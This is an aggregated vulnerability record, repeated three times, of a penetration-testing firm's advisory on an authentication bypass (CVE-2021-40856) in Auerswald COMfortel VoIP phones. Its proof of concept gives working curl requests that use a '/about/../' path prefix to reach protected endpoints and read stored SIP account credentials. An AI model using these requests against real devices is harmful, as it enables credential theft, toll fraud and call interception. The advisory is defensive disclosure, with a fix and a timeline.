Auerswald COMfortel 1400/2600/3600 IP 2.8F Authentication Bypass

2021-12-06T00:00:00

Description

{"id": "PACKETSTORM:165162", "vendorId": null, "type": "packetstorm", "bulletinFamily": "exploit", "title": "Auerswald COMfortel 1400/2600/3600 IP 2.8F Authentication Bypass", "description": "", "published": "2021-12-06T00:00:00", "modified": "2021-12-06T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://packetstormsecurity.com/files/165162/Auerswald-COMfortel-1400-2600-3600-IP-2.8F-Authentication-Bypass.html", "reporter": "redteam-pentesting.de", "references": [], "cvelist": ["CVE-2021-40856"], "immutableFields": [], "lastseen": "2021-12-06T17:16:11", "viewCount": 135, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-40856"]}, {"type": "exploitdb", "idList": ["EDB-ID:50565"]}, {"type": "zdt", "idList": ["1337DAY-ID-37104"]}], "rev": 4}, "score": {"value": 5.9, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2021-40856"]}, {"type": "exploitdb", "idList": ["EDB-ID:50565"]}, {"type": "zdt", "idList": ["1337DAY-ID-37104"]}]}, "exploitation": null, "vulnersScore": 5.9}, "sourceHref": "https://packetstormsecurity.com/files/download/165162/rt-sa-2021-004.txt", "sourceData": "`Advisory: Auerswald COMfortel 1400/2600/3600 IP Authentication Bypass \n \n \nRedTeam Pentesting discovered a vulnerability in the web-based \nconfiguration management interface of the Auerswald COMfortel 1400 and \n2600 IP desktop phones. The vulnerability allows accessing configuration \ndata and settings in the web-based management interface without \nauthentication. \n \n \nDetails \n======= \n \nProduct: Auerswald COMfortel 1400 IP, COMfortel 2600 IP, COMfortel 3600 IP \nAffected Versions: <= 2.8F \nFixed Versions: 2.8G (for COMfortel 1400 IP, COMfortel 2600 IP, COMfortel 3600 IP) \nVulnerability Type: Authentication Bypass \nSecurity Risk: high \nVendor URL: https://www.auerswald.de \nVendor Status: fixed version released \nAdvisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2021-004 \nAdvisory Status: published \nCVE: CVE-2021-40856 \nCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40856 \n \n \nIntroduction \n============ \n \n\"The COMfortel 2600 IP is an Android-based hybrid VoIP telephone (SIP and \nIP system phone), with 4.3\" colour touch display and preconfigured \nanswering machine\" \n \n(from the vendor's homepage) \n \n \nMore Details \n============ \n \nDuring a penetration test it was discovened that several VoIP phones \n(COMfortel 2600 and 1400 IP) by the manufacturer Auerswald allow \naccessing administrative functions without login credentials, bypassing \nthe authentication. This can be achieved by simply prefixing API \nendpoints that require authentication with \"/about/../\", since the \n\"/about\" endpoint does not require any authentication. \n \n \nProof of Concept \n================ \n \nThe phones run a web-based management interface on Port 80. If accessed, \nthe HTTP response code 401 together with a website redirecting to the \npath \"/statics/pageChallenge.html\" is returned. This can for example be \nseen using the command-line HTTP client curl[1] as follows: \n \n------------------------------------------------------------------------ \n$ curl --include 'http://192.168.1.190/' \nHTTP/1.1 401 Unauthorized \n[...] \n \n<!DOCTYPE html><html><head><meta http-equiv='refresh' content='0; \nURL=/statics/pageChallenge.html'></head><body></body></html> \n------------------------------------------------------------------------ \n \nThe website contains JavaScript code that requests the path \n\"/about?action=get\" and loads a JSON document (formatted and shortened \nto increase readability): \n \n------------------------------------------------------------------------ \n$ curl --include 'http://192.168.1.190/about?action=get' \n \nHTTP/1.1 200 OK \nContent-Type: application/json; charset=utf-8; \nCache-Control: no-cache \nContent-Length: 3673 \nDate: Mon, 30 Aug 2021 08:39:24 GMT \nServer: lighttpd \n \n{ \n\"DATA\": { \n\"firmware\": { \n\"TYPE\": \"DATAITEM\", \n\"VALUE\": \"2.8E\", \n\"KEY\": \"firmware\" \n}, \n\"serial\": { \n\"TYPE\": \"DATAITEM\", \n\"VALUE\": \"1234567890\", \n\"KEY\": \"serial\" \n}, \n[...] \n} \n} \n \n------------------------------------------------------------------------ \n \nAmong other information, this JSON document contains the serial number \nand firmware version displayed on the website. This action can be \naccessed without authentication. Other endpoints require authentication, \nfor example the path \"/tree?action=get\", from which the menu structure \nis loaded after successful authentication: \n \n------------------------------------------------------------------------ \n$ curl --include 'http://192.168.1.190/tree?action=get' \nHTTP/1.1 401 Unauthorized \n[...] \n \n<!DOCTYPE html><html><head><meta http-equiv='refresh' content='0; \nURL=/statics/pageChallenge.html'></head><body></body></html> \n------------------------------------------------------------------------ \n \nDuring the penetration test, it was discovered that this action can \nsuccessfully be requested by inserting the prefix \"/about/../\". In order \nto prevent curl from normalizing the URL path, the option \"--path-as-is\" \nmust be supplied: \n \n------------------------------------------------------------------------ \n$ curl --include --path-as-is \\ \n'http://192.168.1.190/about/../tree?action=get' \n \nHTTP/1.1 200 OK \nContent-Type: application/json; charset=utf-8; \nCache-Control: no-cache \nContent-Length: 3808 \nDate: Mon, 30 Aug 2021 08:42:11 GMT \nServer: lighttpd \n \n{ \n\"TYPE\": \"TREENODEPAGE\", \n\"ITEMS\": { \n\"COUNT\": 2, \n\"TYPE\": \"ITEMLIST\", \n\"1\": { \n\"id\": 31, \n\"text\": \"applications_settings\", \n\"TYPE\": \"TREENODEPAGE\", \n\"ITEMS\": { \n\"COUNT\": 1, \n\"TYPE\": \"ITEMLIST\", \n\"0\": { \n\"target\": \"pageFunctionkeys.html\", \n\"id\": 32, \n\"action\": \"/functionkeys\", \n\"text\": \"key_app\", \n\"pagename\": \"Functionkeys\", \n\"TYPE\": \"TREENODEPAGE\" \n} \n} \n}, \n[...] \n} \n} \n------------------------------------------------------------------------ \n \nThe endpoint \"/account\" allows listing account data: \n \n------------------------------------------------------------------------ \n$ curl --include --path-as-is \\ \n'http://192.168.1.190/about/../account?action=list' \n \nHTTP/1.1 200 OK \nContent-Type: application/json; charset=utf-8; \nCache-Control: no-cache \nContent-Length: 793 \nDate: Mon, 30 Aug 2021 08:43:33 GMT \nServer: lighttpd \n \n{ \n\"DATA\": { \n[...] \n\"accountList0\": { \n\"KEY\": \"accountList0\", \n\"COUNT\": 1, \n\"TYPE\": \"DATAMODEL\", \n\"VALUE\": { \n\"0\": { \n\"ID\": 32327, \n\"PARENTID\": 0, \n\"PROVIDER\": \"ProviderName\", \n\"NAME\": \"123 Example User\", \n\"STATUS\": 4, \n\"DEFAULT\": 1 \n} \n}, \n[...] \n}, \n} \n} \n------------------------------------------------------------------------ \n \nThe ID 32327 can then be used to get details about that particular \naccount, including the username and password: \n \n------------------------------------------------------------------------ \n$ curl --include --path-as-is \\ \n'http://192.168.1.190/about/../account?action=get&itemID=32327' \n \nHTTP/1.1 200 OK \nContent-Type: application/json; charset=utf-8; \nCache-Control: no-cache \nContent-Length: 2026 \nDate: Mon, 30 Aug 2021 08:44:13 GMT \nServer: lighttpd \n \n{ \n\"DATA\": { \n[...] \n\"Benutzer\": { \n\"TYPE\": \"DATAITEM\", \n\"VALUE\": \"123\", \n\"KEY\": \"Benutzer\" \n}, \n\"Passwort\": { \n\"TYPE\": \"DATAITEM\", \n\"VALUE\": \"secret\", \n\"KEY\": \"Passwort\" \n}, \n[...] \n} \n} \n------------------------------------------------------------------------ \n \nUsing a script for Zed Attack Proxy[2], RedTeam Pentesting managed to \naccess and use the web-based management interface as if regular login \ncredentials were presented. \n \nIt is likely that other functionality can be accessed in the same way, \nto for example change settings or activate the integrated option for \nrecording the Ethernet traffic. \n \n \nWorkaround \n========== \n \nDisable the web-based management interface if possible. \n \n \nFix \n=== \n \nUpgrade to a firmware version which corrects this vulnerability. \n \n \nSecurity Risk \n============= \n \nInserting the prefix \"/about/../\" allows bypassing the authentication \ncheck for the web-based configuration management interface. This enables \nattackers to gain access to the login credentials used for \nauthentication at the PBX, among other data. \n \nAttackers can then authenticate at the PBX as the respective phone and \nfor example call premium rate phone lines they operate to generate \nrevenue. They can also configure a device they control as the PBX in the \nphone, so all incoming and outgoing phone calls are intercepted and can \nbe recorded. The device also contains a function to record all Ethernet \ndata traffic, which is likely affected as well. \n \nOverall, the vulnerability completely bypasses the authentication for \nthe web-based management interface and therefore poses a high risk. \n \n \nReferences \n========== \n \n[1] https://curl.se \n[2] https://github.com/zaproxy/zaproxy/ \n \nTimeline \n======== \n \n2021-08-26 Vulnerability identified \n2021-09-01 Customer approved disclosure to vendor \n2021-09-10 Vendor notified \n2021-09-10 CVE ID requested \n2021-09-10 CVE ID assigned \n2021-10-04 Vendor provides access to device with fixed firmware \n2021-10-05 RedTeam Pentesting examines device, vulnerability seems to be corrected \n2021-10-14 Vendor releases corrected firmware version 2.8G \n2021-12-06 Advisory published \n \n \nRedTeam Pentesting GmbH \n======================= \n \nRedTeam Pentesting offers individual penetration tests performed by a \nteam of specialised IT-security experts. Hereby, security weaknesses in \ncompany networks or products are uncovered and can be fixed immediately. \n \nAs there are only few experts in this field, RedTeam Pentesting wants to \nshare its knowledge and enhance the public knowledge with research in \nsecurity-related areas. The results are made available as public \nsecurity advisories. \n \nMore information about RedTeam Pentesting can be found at: \nhttps://www.redteam-pentesting.de/ \n \n \nWorking at RedTeam Pentesting \n============================= \n \nRedTeam Pentesting is looking for penetration testers to join our team \nin Aachen, Germany. If you are interested please visit: \nhttps://www.redteam-pentesting.de/jobs/ \n \n \n-- \nRedTeam Pentesting GmbH Tel.: +49 241 510081-0 \nDennewartstr. 25-27 Fax : +49 241 510081-99 \n52068 Aachen https://www.redteam-pentesting.de \nGermany Registergericht: Aachen HRB 14004 \nGesch\u00e4ftsf\u00fchrer: Patrick Hof, Jens Liebchen \n`\n", "_state": {"dependencies": 1646501628}}

{"cve": [{"lastseen": "2022-03-23T19:13:33", "description": "Auerswald COMfortel 1400 IP and 2600 IP before 2.8G devices allow Authentication Bypass via the /about/../ substring.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-12-13T04:15:00", "type": "cve", "title": "CVE-2021-40856", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40856"], "modified": "2022-01-04T16:08:00", "cpe": ["cpe:/o:auerswald:comfortel_1400_ip_firmware:2.8f", "cpe:/o:auerswald:comfortel_3600_ip_firmware:2.8f", "cpe:/o:auerswald:comfortel_2600_ip_firmware:2.8f"], "id": "CVE-2021-40856", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-40856", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:auerswald:comfortel_2600_ip_firmware:2.8f:*:*:*:*:*:*:*", "cpe:2.3:o:auerswald:comfortel_1400_ip_firmware:2.8f:*:*:*:*:*:*:*", "cpe:2.3:o:auerswald:comfortel_3600_ip_firmware:2.8f:*:*:*:*:*:*:*"]}], "zdt": [{"lastseen": "2021-12-27T01:17:57", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-12-06T00:00:00", "type": "zdt", "title": "Auerswald COMfortel 2.8F - Authentication Bypass Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40856"], "modified": "2021-12-06T00:00:00", "id": "1337DAY-ID-37104", "href": "https://0day.today/exploit/description/37104", "sourceData": "# Exploit Title: Auerswald COMfortel 2.8F - Authentication Bypass\n# Exploit Author: RedTeam Pentesting GmbH\n# Version: 1400/2600/3600\n\nAdvisory: Auerswald COMfortel 1400/2600/3600 IP Authentication Bypass\n\n\nRedTeam Pentesting discovered a vulnerability in the web-based\nconfiguration management interface of the Auerswald COMfortel 1400 and\n2600 IP desktop phones. The vulnerability allows accessing configuration\ndata and settings in the web-based management interface without\nauthentication.\n\n\nDetails\n=======\n\nProduct: Auerswald COMfortel 1400 IP, COMfortel 2600 IP, COMfortel 3600 IP\nAffected Versions: <= 2.8F\nFixed Versions: 2.8G (for COMfortel 1400 IP, COMfortel 2600 IP, COMfortel 3600 IP)\nVulnerability Type: Authentication Bypass\nSecurity Risk: high\nVendor URL: https://www.auerswald.de\nVendor Status: fixed version released\nAdvisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2021-004\nAdvisory Status: published\nCVE: CVE-2021-40856\nCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40856\n\n\nIntroduction\n============\n\n\"The COMfortel 2600 IP is an Android-based hybrid VoIP telephone (SIP and\nIP system phone), with 4.3\" colour touch display and preconfigured\nanswering machine\"\n\n(from the vendor's homepage)\n\n\nMore Details\n============\n\nDuring a penetration test it was discovened that several VoIP phones\n(COMfortel 2600 and 1400 IP) by the manufacturer Auerswald allow\naccessing administrative functions without login credentials, bypassing\nthe authentication. This can be achieved by simply prefixing API\nendpoints that require authentication with \"/about/../\", since the\n\"/about\" endpoint does not require any authentication.\n\n\nProof of Concept\n================\n\nThe phones run a web-based management interface on Port 80. If accessed,\nthe HTTP response code 401 together with a website redirecting to the\npath \"/statics/pageChallenge.html\" is returned. This can for example be\nseen using the command-line HTTP client curl[1] as follows:\n\n------------------------------------------------------------------------\n$ curl --include 'http://192.168.1.190/'\nHTTP/1.1 401 Unauthorized\n[...]\n\n<!DOCTYPE html><html><head><meta http-equiv='refresh' content='0;\nURL=/statics/pageChallenge.html'></head><body></body></html>\n------------------------------------------------------------------------\n\nThe website contains JavaScript code that requests the path\n\"/about?action=get\" and loads a JSON document (formatted and shortened\nto increase readability):\n\n------------------------------------------------------------------------\n$ curl --include 'http://192.168.1.190/about?action=get'\n\nHTTP/1.1 200 OK\nContent-Type: application/json; charset=utf-8;\nCache-Control: no-cache\nContent-Length: 3673\nDate: Mon, 30 Aug 2021 08:39:24 GMT\nServer: lighttpd\n\n{\n \"DATA\": {\n \"firmware\": {\n \"TYPE\": \"DATAITEM\",\n \"VALUE\": \"2.8E\",\n \"KEY\": \"firmware\"\n },\n \"serial\": {\n \"TYPE\": \"DATAITEM\",\n \"VALUE\": \"1234567890\",\n \"KEY\": \"serial\"\n },\n [...]\n }\n}\n\n------------------------------------------------------------------------\n\nAmong other information, this JSON document contains the serial number\nand firmware version displayed on the website. This action can be\naccessed without authentication. Other endpoints require authentication,\nfor example the path \"/tree?action=get\", from which the menu structure\nis loaded after successful authentication:\n\n------------------------------------------------------------------------\n$ curl --include 'http://192.168.1.190/tree?action=get'\nHTTP/1.1 401 Unauthorized\n[...]\n\n<!DOCTYPE html><html><head><meta http-equiv='refresh' content='0;\nURL=/statics/pageChallenge.html'></head><body></body></html>\n------------------------------------------------------------------------\n\nDuring the penetration test, it was discovered that this action can\nsuccessfully be requested by inserting the prefix \"/about/../\". In order\nto prevent curl from normalizing the URL path, the option \"--path-as-is\"\nmust be supplied:\n\n------------------------------------------------------------------------\n$ curl --include --path-as-is \\\n 'http://192.168.1.190/about/../tree?action=get'\n\nHTTP/1.1 200 OK\nContent-Type: application/json; charset=utf-8;\nCache-Control: no-cache\nContent-Length: 3808\nDate: Mon, 30 Aug 2021 08:42:11 GMT\nServer: lighttpd\n\n{\n \"TYPE\": \"TREENODEPAGE\",\n \"ITEMS\": {\n \"COUNT\": 2,\n \"TYPE\": \"ITEMLIST\",\n \"1\": {\n \"id\": 31,\n \"text\": \"applications_settings\",\n \"TYPE\": \"TREENODEPAGE\",\n \"ITEMS\": {\n \"COUNT\": 1,\n \"TYPE\": \"ITEMLIST\",\n \"0\": {\n \"target\": \"pageFunctionkeys.html\",\n \"id\": 32,\n \"action\": \"/functionkeys\",\n \"text\": \"key_app\",\n \"pagename\": \"Functionkeys\",\n \"TYPE\": \"TREENODEPAGE\"\n }\n }\n },\n [...]\n }\n}\n------------------------------------------------------------------------\n\nThe endpoint \"/account\" allows listing account data:\n\n------------------------------------------------------------------------\n$ curl --include --path-as-is \\\n 'http://192.168.1.190/about/../account?action=list'\n\nHTTP/1.1 200 OK\nContent-Type: application/json; charset=utf-8;\nCache-Control: no-cache\nContent-Length: 793\nDate: Mon, 30 Aug 2021 08:43:33 GMT\nServer: lighttpd\n\n{\n \"DATA\": {\n [...]\n \"accountList0\": {\n \"KEY\": \"accountList0\",\n \"COUNT\": 1,\n \"TYPE\": \"DATAMODEL\",\n \"VALUE\": {\n \"0\": {\n \"ID\": 32327,\n \"PARENTID\": 0,\n \"PROVIDER\": \"ProviderName\",\n \"NAME\": \"123 Example User\",\n \"STATUS\": 4,\n \"DEFAULT\": 1\n }\n },\n [...]\n },\n }\n}\n------------------------------------------------------------------------\n\nThe ID 32327 can then be used to get details about that particular\naccount, including the username and password:\n\n------------------------------------------------------------------------\n$ curl --include --path-as-is \\\n 'http://192.168.1.190/about/../account?action=get&itemID=32327'\n\nHTTP/1.1 200 OK\nContent-Type: application/json; charset=utf-8;\nCache-Control: no-cache\nContent-Length: 2026\nDate: Mon, 30 Aug 2021 08:44:13 GMT\nServer: lighttpd\n\n{\n \"DATA\": {\n [...]\n \"Benutzer\": {\n \"TYPE\": \"DATAITEM\",\n \"VALUE\": \"123\",\n \"KEY\": \"Benutzer\"\n },\n \"Passwort\": {\n \"TYPE\": \"DATAITEM\",\n \"VALUE\": \"secret\",\n \"KEY\": \"Passwort\"\n },\n [...]\n }\n}\n------------------------------------------------------------------------\n\nUsing a script for Zed Attack Proxy[2], RedTeam Pentesting managed to\naccess and use the web-based management interface as if regular login\ncredentials were presented.\n\nIt is likely that other functionality can be accessed in the same way,\nto for example change settings or activate the integrated option for\nrecording the Ethernet traffic.\n\n\nWorkaround\n==========\n\nDisable the web-based management interface if possible.\n\n\nFix\n===\n\nUpgrade to a firmware version which corrects this vulnerability.\n\n\nSecurity Risk\n=============\n\nInserting the prefix \"/about/../\" allows bypassing the authentication\ncheck for the web-based configuration management interface. This enables\nattackers to gain access to the login credentials used for\nauthentication at the PBX, among other data.\n\nAttackers can then authenticate at the PBX as the respective phone and\nfor example call premium rate phone lines they operate to generate\nrevenue. They can also configure a device they control as the PBX in the\nphone, so all incoming and outgoing phone calls are intercepted and can\nbe recorded. The device also contains a function to record all Ethernet\ndata traffic, which is likely affected as well.\n\nOverall, the vulnerability completely bypasses the authentication for\nthe web-based management interface and therefore poses a high risk.\n\n\nReferences\n==========\n\n[1] https://curl.se\n[2] https://github.com/zaproxy/zaproxy/\n\nTimeline\n========\n\n2021-08-26 Vulnerability identified\n2021-09-01 Customer approved disclosure to vendor\n2021-09-10 Vendor notified\n2021-09-10 CVE ID requested\n2021-09-10 CVE ID assigned\n2021-10-04 Vendor provides access to device with fixed firmware\n2021-10-05 RedTeam Pentesting examines device, vulnerability seems to be corrected\n2021-10-14 Vendor releases corrected firmware version 2.8G\n2021-12-06 Advisory published\n\n", "sourceHref": "https://0day.today/exploit/37104", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "exploitdb": [{"lastseen": "2022-01-13T05:28:00", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-12-06T00:00:00", "type": "exploitdb", "title": "Auerswald COMfortel 2.8F - Authentication Bypass", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40856"], "modified": "2021-12-06T00:00:00", "id": "EDB-ID:50565", "href": "https://www.exploit-db.com/exploits/50565", "sourceData": "# Exploit Title: Auerswald COMfortel 2.8F - Authentication Bypass\r\n# Date: 06/12/2021\r\n# Exploit Author: RedTeam Pentesting GmbH\r\n# Version: 1400/2600/3600\r\n\r\nAdvisory: Auerswald COMfortel 1400/2600/3600 IP Authentication Bypass\r\n\r\n\r\nRedTeam Pentesting discovered a vulnerability in the web-based\r\nconfiguration management interface of the Auerswald COMfortel 1400 and\r\n2600 IP desktop phones. The vulnerability allows accessing configuration\r\ndata and settings in the web-based management interface without\r\nauthentication.\r\n\r\n\r\nDetails\r\n=======\r\n\r\nProduct: Auerswald COMfortel 1400 IP, COMfortel 2600 IP, COMfortel 3600 IP\r\nAffected Versions: <= 2.8F\r\nFixed Versions: 2.8G (for COMfortel 1400 IP, COMfortel 2600 IP, COMfortel 3600 IP)\r\nVulnerability Type: Authentication Bypass\r\nSecurity Risk: high\r\nVendor URL: https://www.auerswald.de\r\nVendor Status: fixed version released\r\nAdvisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2021-004\r\nAdvisory Status: published\r\nCVE: CVE-2021-40856\r\nCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40856\r\n\r\n\r\nIntroduction\r\n============\r\n\r\n\"The COMfortel 2600 IP is an Android-based hybrid VoIP telephone (SIP and\r\nIP system phone), with 4.3\" colour touch display and preconfigured\r\nanswering machine\"\r\n\r\n(from the vendor's homepage)\r\n\r\n\r\nMore Details\r\n============\r\n\r\nDuring a penetration test it was discovened that several VoIP phones\r\n(COMfortel 2600 and 1400 IP) by the manufacturer Auerswald allow\r\naccessing administrative functions without login credentials, bypassing\r\nthe authentication. This can be achieved by simply prefixing API\r\nendpoints that require authentication with \"/about/../\", since the\r\n\"/about\" endpoint does not require any authentication.\r\n\r\n\r\nProof of Concept\r\n================\r\n\r\nThe phones run a web-based management interface on Port 80. If accessed,\r\nthe HTTP response code 401 together with a website redirecting to the\r\npath \"/statics/pageChallenge.html\" is returned. This can for example be\r\nseen using the command-line HTTP client curl[1] as follows:\r\n\r\n------------------------------------------------------------------------\r\n$ curl --include 'http://192.168.1.190/'\r\nHTTP/1.1 401 Unauthorized\r\n[...]\r\n\r\n<!DOCTYPE html><html><head><meta http-equiv='refresh' content='0;\r\nURL=/statics/pageChallenge.html'></head><body></body></html>\r\n------------------------------------------------------------------------\r\n\r\nThe website contains JavaScript code that requests the path\r\n\"/about?action=get\" and loads a JSON document (formatted and shortened\r\nto increase readability):\r\n\r\n------------------------------------------------------------------------\r\n$ curl --include 'http://192.168.1.190/about?action=get'\r\n\r\nHTTP/1.1 200 OK\r\nContent-Type: application/json; charset=utf-8;\r\nCache-Control: no-cache\r\nContent-Length: 3673\r\nDate: Mon, 30 Aug 2021 08:39:24 GMT\r\nServer: lighttpd\r\n\r\n{\r\n \"DATA\": {\r\n \"firmware\": {\r\n \"TYPE\": \"DATAITEM\",\r\n \"VALUE\": \"2.8E\",\r\n \"KEY\": \"firmware\"\r\n },\r\n \"serial\": {\r\n \"TYPE\": \"DATAITEM\",\r\n \"VALUE\": \"1234567890\",\r\n \"KEY\": \"serial\"\r\n },\r\n [...]\r\n }\r\n}\r\n\r\n------------------------------------------------------------------------\r\n\r\nAmong other information, this JSON document contains the serial number\r\nand firmware version displayed on the website. This action can be\r\naccessed without authentication. Other endpoints require authentication,\r\nfor example the path \"/tree?action=get\", from which the menu structure\r\nis loaded after successful authentication:\r\n\r\n------------------------------------------------------------------------\r\n$ curl --include 'http://192.168.1.190/tree?action=get'\r\nHTTP/1.1 401 Unauthorized\r\n[...]\r\n\r\n<!DOCTYPE html><html><head><meta http-equiv='refresh' content='0;\r\nURL=/statics/pageChallenge.html'></head><body></body></html>\r\n------------------------------------------------------------------------\r\n\r\nDuring the penetration test, it was discovered that this action can\r\nsuccessfully be requested by inserting the prefix \"/about/../\". In order\r\nto prevent curl from normalizing the URL path, the option \"--path-as-is\"\r\nmust be supplied:\r\n\r\n------------------------------------------------------------------------\r\n$ curl --include --path-as-is \\\r\n 'http://192.168.1.190/about/../tree?action=get'\r\n\r\nHTTP/1.1 200 OK\r\nContent-Type: application/json; charset=utf-8;\r\nCache-Control: no-cache\r\nContent-Length: 3808\r\nDate: Mon, 30 Aug 2021 08:42:11 GMT\r\nServer: lighttpd\r\n\r\n{\r\n \"TYPE\": \"TREENODEPAGE\",\r\n \"ITEMS\": {\r\n \"COUNT\": 2,\r\n \"TYPE\": \"ITEMLIST\",\r\n \"1\": {\r\n \"id\": 31,\r\n \"text\": \"applications_settings\",\r\n \"TYPE\": \"TREENODEPAGE\",\r\n \"ITEMS\": {\r\n \"COUNT\": 1,\r\n \"TYPE\": \"ITEMLIST\",\r\n \"0\": {\r\n \"target\": \"pageFunctionkeys.html\",\r\n \"id\": 32,\r\n \"action\": \"/functionkeys\",\r\n \"text\": \"key_app\",\r\n \"pagename\": \"Functionkeys\",\r\n \"TYPE\": \"TREENODEPAGE\"\r\n }\r\n }\r\n },\r\n [...]\r\n }\r\n}\r\n------------------------------------------------------------------------\r\n\r\nThe endpoint \"/account\" allows listing account data:\r\n\r\n------------------------------------------------------------------------\r\n$ curl --include --path-as-is \\\r\n 'http://192.168.1.190/about/../account?action=list'\r\n\r\nHTTP/1.1 200 OK\r\nContent-Type: application/json; charset=utf-8;\r\nCache-Control: no-cache\r\nContent-Length: 793\r\nDate: Mon, 30 Aug 2021 08:43:33 GMT\r\nServer: lighttpd\r\n\r\n{\r\n \"DATA\": {\r\n [...]\r\n \"accountList0\": {\r\n \"KEY\": \"accountList0\",\r\n \"COUNT\": 1,\r\n \"TYPE\": \"DATAMODEL\",\r\n \"VALUE\": {\r\n \"0\": {\r\n \"ID\": 32327,\r\n \"PARENTID\": 0,\r\n \"PROVIDER\": \"ProviderName\",\r\n \"NAME\": \"123 Example User\",\r\n \"STATUS\": 4,\r\n \"DEFAULT\": 1\r\n }\r\n },\r\n [...]\r\n },\r\n }\r\n}\r\n------------------------------------------------------------------------\r\n\r\nThe ID 32327 can then be used to get details about that particular\r\naccount, including the username and password:\r\n\r\n------------------------------------------------------------------------\r\n$ curl --include --path-as-is \\\r\n 'http://192.168.1.190/about/../account?action=get&itemID=32327'\r\n\r\nHTTP/1.1 200 OK\r\nContent-Type: application/json; charset=utf-8;\r\nCache-Control: no-cache\r\nContent-Length: 2026\r\nDate: Mon, 30 Aug 2021 08:44:13 GMT\r\nServer: lighttpd\r\n\r\n{\r\n \"DATA\": {\r\n [...]\r\n \"Benutzer\": {\r\n \"TYPE\": \"DATAITEM\",\r\n \"VALUE\": \"123\",\r\n \"KEY\": \"Benutzer\"\r\n },\r\n \"Passwort\": {\r\n \"TYPE\": \"DATAITEM\",\r\n \"VALUE\": \"secret\",\r\n \"KEY\": \"Passwort\"\r\n },\r\n [...]\r\n }\r\n}\r\n------------------------------------------------------------------------\r\n\r\nUsing a script for Zed Attack Proxy[2], RedTeam Pentesting managed to\r\naccess and use the web-based management interface as if regular login\r\ncredentials were presented.\r\n\r\nIt is likely that other functionality can be accessed in the same way,\r\nto for example change settings or activate the integrated option for\r\nrecording the Ethernet traffic.\r\n\r\n\r\nWorkaround\r\n==========\r\n\r\nDisable the web-based management interface if possible.\r\n\r\n\r\nFix\r\n===\r\n\r\nUpgrade to a firmware version which corrects this vulnerability.\r\n\r\n\r\nSecurity Risk\r\n=============\r\n\r\nInserting the prefix \"/about/../\" allows bypassing the authentication\r\ncheck for the web-based configuration management interface. This enables\r\nattackers to gain access to the login credentials used for\r\nauthentication at the PBX, among other data.\r\n\r\nAttackers can then authenticate at the PBX as the respective phone and\r\nfor example call premium rate phone lines they operate to generate\r\nrevenue. They can also configure a device they control as the PBX in the\r\nphone, so all incoming and outgoing phone calls are intercepted and can\r\nbe recorded. The device also contains a function to record all Ethernet\r\ndata traffic, which is likely affected as well.\r\n\r\nOverall, the vulnerability completely bypasses the authentication 